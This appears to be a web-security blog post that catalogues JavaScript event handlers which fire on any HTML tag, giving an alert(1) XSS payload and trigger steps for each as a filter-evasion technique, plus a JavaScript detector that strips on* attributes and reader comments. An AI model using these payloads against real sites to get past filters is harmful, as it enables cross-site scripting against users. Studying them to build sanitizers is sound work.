When building XSS payloads, some JavaScript event handlers can be used regardless of the tag they are placed on and work on the 5 major browsers to date (Chrome, Firefox, IE/Edge, Safari and Opera), hence the term “agnostic”.
When we say “regardless”, we mean almost any existing HTML tag (with very few exceptions) and also XML ones (arbitrary tags).
They are very useful for filter evasion because with them we have no tag name restrictions: a filter that only blocks known tag names does not stop them. They also allow some useful tricks for XSS payload building (to be shown in future posts).
For the following examples of simple payloads with agnostic event handlers, we will use the arbitrary tag “<brute”, with the help of the “contenteditable” attribute in some of them (it makes the element focusable and editable, which is what the focus, key and input handlers need).
onblur
<brute contenteditable onblur=alert(1)>lose focus!
Trigger: click with the left mouse button on the “lose focus!” text (or use the tab key to reach it) and then click outside it (or press the tab key again).
onclick
<brute onclick=alert(1)>click this!
Trigger: click with the left mouse button on the “click this!” text.
oncopy
<brute oncopy=alert(1)>copy this!
Trigger: select the “copy this!” text by clicking and holding the left mouse button on it and dragging the cursor. Copy the selected text with Ctrl+C or by choosing the option in the right-click menu. The tab key may also be used instead of selecting the text.
oncontextmenu
<brute oncontextmenu=alert(1)>right click this!
Trigger: click with the right mouse button on the “right click this!” text.
oncut
<brute oncut=alert(1)>copy this!
Trigger: select the “copy this!” text by clicking and holding the left mouse button on it and dragging the cursor. Cut the selected text with Ctrl+X or by choosing the option in the right-click menu. The tab key may also be used instead of selecting the text.
ondblclick
<brute ondblclick=alert(1)>double click this!
Trigger: double-click with the left mouse button on the “double click this!” text.
ondrag
<brute ondrag=alert(1)>drag this!
Trigger: select all of the “drag this!” text by clicking and holding the left mouse button on it and dragging the cursor. Then click and hold the left mouse button on the selected text and drag it.
onfocus
<brute contenteditable onfocus=alert(1)>focus this!
Trigger: click with a mouse button on the “focus this!” text or use the tab key to reach it.
oninput
<brute contenteditable oninput=alert(1)>input here!
Trigger: click with the left mouse button on the “input here!” text (or use the tab key to reach it) and then type any character, alphanumeric or special.
onkeydown
<brute contenteditable onkeydown=alert(1)>press any key!
Trigger: click with the left mouse button on the “press any key!” text (or use the tab key to reach it) and then press a key.
onkeypress
<brute contenteditable onkeypress=alert(1)>press any key!
Trigger: click with the left mouse button on the “press any key!” text (or use the tab key to reach it) and then press a key.
onkeyup
<brute contenteditable onkeyup=alert(1)>press any key!
Trigger: click on the “press any key!” text (or use the tab key to reach it) and then press a key.
onmousedown
<brute onmousedown=alert(1)>click this!
Trigger: click with a mouse button on the “click this!” text.
onmousemove
<brute onmousemove=alert(1)>hover this!
Trigger: place the mouse pointer over the “hover this!” text and then move it.
onmouseout
<brute onmouseout=alert(1)>hover this!
Trigger: place the mouse pointer over the “hover this!” text and then move it out of the text.
onmouseover
<brute onmouseover=alert(1)>hover this!
Trigger: place the mouse pointer over the “hover this!” text.
onmouseup
<brute onmouseup=alert(1)>click this!
Trigger: click and release a mouse button on the “click this!” text.
onpaste
<brute contenteditable onpaste=alert(1)>paste here!
Trigger: select any text somewhere by clicking and holding the left mouse button on it and dragging the cursor. Copy (or cut) the selected text with Ctrl+C (or Ctrl+X) or by choosing the option in the right-click menu; the tab key may also be used instead of selecting the text. Usually there is already something on the clipboard, so this step can be skipped. Then paste it into the “paste here!” text with Ctrl+V or by choosing the option in the right-click menu.
Although they require user interaction, depending on the context it may be trivial to trigger the payload. In some cases it is almost unavoidable, as with payloads that use the style attribute to enlarge the surface for the “onmouse” events, for example:
<brute style=font-size:500px onmouseover=alert(1)>0000
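The defensive takeaway from the list above is that blocking tag names does nothing against these handlers: the tag can be anything, so a filter or detector has to look at attribute names on every tag. The following is an added example, not code from the original post, that shows that check in JavaScript: it scans markup for any attribute whose name starts with “on” (case-insensitively, as HTML attribute names are), reports which ones match the post’s agnostic list, and strips them while leaving tag names and other attributes alone. The sample inputs are the post’s own “<brute” payloads plus a few constructed ones; the tokenizer is a deliberately simple regex that assumes no “>” inside quoted attribute values, so it is meant as a detector or linter rather than as a substitute for a DOM-based sanitizer.

```javascript
// Added example (not from the original post): detect and strip inline event
// handlers on ANY tag, because tag-name filtering cannot catch "agnostic"
// handlers. Regex-based and simplified: assumes no '>' inside quoted values.

// Handlers the post lists as working on any tag. Used only for reporting;
// the check below flags EVERY on* attribute, since browsers know many more.
const AGNOSTIC_HANDLERS = new Set([
  "onblur", "onclick", "oncopy", "oncontextmenu", "oncut", "ondblclick",
  "ondrag", "onfocus", "oninput", "onkeydown", "onkeypress", "onkeyup",
  "onmousedown", "onmousemove", "onmouseout", "onmouseover", "onmouseup",
  "onpaste",
]);

// One start tag: name, attribute body, optional self-closing slash.
const TAG_RE = /<([a-zA-Z][^\s\/>]*)([^>]*?)(\/?)>/g;
// One attribute: name, then optionally ="..." | '...' | bare value.
const ATTR_RE = /([^\s=\/"'<>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

function isEventHandler(attrName) {
  // HTML attribute names are case-insensitive, so OnClick is onclick.
  return attrName.toLowerCase().startsWith("on");
}

// Returns one record per inline event handler found, whatever the tag is.
function findEventHandlers(html) {
  const found = [];
  for (const [, tag, body] of html.matchAll(TAG_RE)) {
    for (const [, name, dq, sq, bare] of body.matchAll(ATTR_RE)) {
      if (!isEventHandler(name)) continue;
      const lower = name.toLowerCase();
      found.push({
        tag: tag.toLowerCase(),
        attr: lower,
        value: dq ?? sq ?? bare ?? "",
        agnostic: AGNOSTIC_HANDLERS.has(lower),
      });
    }
  }
  return found;
}

// Returns the markup with every on* attribute removed; tags and the other
// attributes (contenteditable, style, ...) are kept as they were.
function stripEventHandlers(html) {
  return html.replace(TAG_RE, (whole, tag, body, slash) => {
    const kept = body.replace(ATTR_RE, (attr, name) =>
      isEventHandler(name) ? "" : attr
    );
    const attrs = kept.trim();
    return "<" + tag + (attrs ? " " + attrs : "") + (slash ? " /" : "") + ">";
  });
}

// Constructed samples: the post's payloads plus a mixed-case variant and a
// handler (onload) that is not on the agnostic list.
const SAMPLES = [
  "<brute contenteditable onblur=alert(1)>lose focus!",
  "<brute style=font-size:500px onmouseover=alert(1)>0000",
  '<x OnMouseOver="alert(1)">',
  "<x onload=alert(1)>",
  "<p class=\"a\" title='b'>safe</p>",
];

for (const s of SAMPLES) {
  console.log(s);
  console.log("  handlers:", JSON.stringify(findEventHandlers(s)));
  console.log("  stripped:", stripEventHandlers(s));
}
```

Run it with Node (no dependencies). The point to notice in the output is that the record for “<brute” and for “<x” is identical in shape: the detector never had to know the tag name, which is exactly why an allow-list of tag names alone is not a sufficient XSS control, and why a real sanitizer should drop all on* attributes (and “javascript:” URLs) before considering which elements to keep.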
You may test them on:
#hack2learn
Keep on writing, great job!
Awesome post!!!! Helped me perform the filter evasion…
Keep up the good work.
Can you start the course for the same?
Thanks, maybe until the end of this year.
[…] So the next step is just trying all event handlers allowed based on that number of chars; after finding one that does not get blocked, change the “<x” tag to one associated with it (no need if it’s one of the agnostic event handlers). […]
[…] Agnostic Event Handlers […]
[…] to a tester/attacker by using the resulting “<InvalidTag” string with any of the agnostic event handlers to form a new attacking […]
[…] door to a tester/attacker by using the resulting “<InvalidTag” string with any of the agnostic event handlers to form a new attacking […]